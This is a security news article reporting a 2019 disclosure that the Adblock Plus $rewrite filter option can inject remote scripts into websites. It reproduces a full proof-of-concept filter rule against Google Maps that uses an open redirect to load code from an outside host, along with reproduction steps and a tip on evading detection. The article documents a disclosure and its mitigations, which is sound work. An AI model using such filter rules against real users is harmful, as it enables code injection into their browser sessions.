Security Affairs
U.S. Treasury Sanctions VPN Provider and Cryptor Seller Behind Billions in Ransomware Losses|Attacker Used AI to Build Custom PowerShell Recon Malware|Malware Hits Japan’s Largest Taxi Company Nihon Kotsu, Services Temporarily Suspended|CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper|Lidl Notified Online Shop Customers in Germany, Belgium, and the Netherlands of a Data Breach|U.S. CISA adds a Cisco IOS flaw to its Known Exploited Vulnerabilities catalog|EU Targets FSB-Linked Hackers in New Sanctions Over Cyber Sabotage|Dutch Nationals Suspected in Odido Hack That Exposed Six Million Customers|Australia Alerts Organizations to Ongoing CMS Exploitation Attacks|Ryuk Ransomware Member Pleads Guilty Over Attacks on U.S. Organizations|Progress Told ShareFile Customers to Pull the Plug on Their Servers. Here’s What We Know.|SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 105|U.S. Treasury Sanctions VPN Provider and Cryptor Seller Behind Billions in Ransomware Losses|Attacker Used AI to Build Custom PowerShell Recon Malware|Malware Hits Japan’s Largest Taxi Company Nihon Kotsu, Services Temporarily Suspended|CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper|Lidl Notified Online Shop Customers in Germany, Belgium, and the Netherlands of a Data Breach|U.S. CISA adds a Cisco IOS flaw to its Known Exploited Vulnerabilities catalog|EU Targets FSB-Linked Hackers in New Sanctions Over Cyber Sabotage|Dutch Nationals Suspected in Odido Hack That Exposed Six Million Customers|Australia Alerts Organizations to Ongoing CMS Exploitation Attacks|Ryuk Ransomware Member Pleads Guilty Over Attacks on U.S. Organizations|Progress Told ShareFile Customers to Pull the Plug on Their Servers. Here’s What We Know.|SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 105|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Adblock Plus filter can be exploited to execute arbitrary code in web pages

Expert discovered an exploit that could allow ad blocking filter list maintainers for the Adblock Plus, AdBlock, and uBlocker browser extensions to craft filters to inject remote scripts into web sites. ad blocking extensions receive in input a list of malicious URLs that prevents the browser from connecting to them. With the release of Adblocker […]

ADblock exploit

Expert discovered an exploit that could allow ad blocking filter list maintainers for the Adblock Plus, AdBlock, and uBlocker browser extensions to craft filters to inject remote scripts into web sites.

ad blocking extensions receive in input a list of malicious URLs that prevents the browser from connecting to them.

With the release of Adblocker Plus 3.2 in 2018, a new filter list option was implemented to allow a list maintainer to replace a web request. The option called $rewrite allows to replace an URL that matches a particular regular expression with another URL.

Security researcher Armin Sebastian discovered that under certain conditions it is possible to create a rule that injects a remote script into a target site.

“Under certain conditions the $rewrite filter option enables filter list maintainers to inject arbitrary code in web pages.” Armin wrote.

“The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.”

The exploit is possible with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.

Extensions periodically update filters at intervals determined by filter list operators. An attacker may set a short expiration time for the malicious filter list, and replace with a benign one shortly after the attack making it impossible to detect.

In order to use the exploit against a service, the following criteria must be met:

  1. The page must load a JS string using XMLHttpRequest or Fetch and execute the returned code
  2. The page must not restrict origins from which it can fetch using Content Security Policy directives, or it must not validate the final request URL before executing the downloaded code
  3. The origin of the fetched code must have a server-side open redirect or it must host arbitrary user content

Armin Sebastian used Google Maps for his test:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

The above rule redirects users visiting Google Maps to Google’s I’m Feeling Lucky search service, that in turn redirects to a page
from https://majestic-ramsons.herokuapp[.]com/ with the payload: “alert(document.domain)”.

ADblock exploit

Below the procedure for running arbitrary code on Google Maps:

  1. Install either Adblock Plus, AdBlock or uBlock in a new browser profile
  2. Visit the options of the extension and add the example filter list, this step is meant to simulate a malicious update to a default filter list
  3. Navigate to Google Maps
  4. An alert with “www.google.com” should pop up after a couple of seconds

The expert reported the issue to Google, but they rejected it classifying the issue as an “Intended behavior”.

“Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.” wrote the expert.

Armin Sebastian recommends that web sites utilize the Content Security Policy header and the connect-src option to specify a whitelist of sites that scripts can be loaded from.

The exploit can be mitigated in the affected web services by whitelisting known origins using the connect-src CSP header, or by eliminating server-side open redirects.

Update April 16, 2019

Adblockplus is already working on eliminating any risk for its users.

“It is our responsibility to protect our users, and despite the actual risk being very low, we have decided to remove the rewrite option and will accordingly release an updated version of Adblock Plus as soon as technically possible.We are doing this as a measure of precaution. There has not been any attempt of abusing the rewrite option and we will do everything we can to ensure this won’t happen.” reads a statement published by adblockplus.org.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

[adrotate banner=”5″]

[adrotate banner=”13″]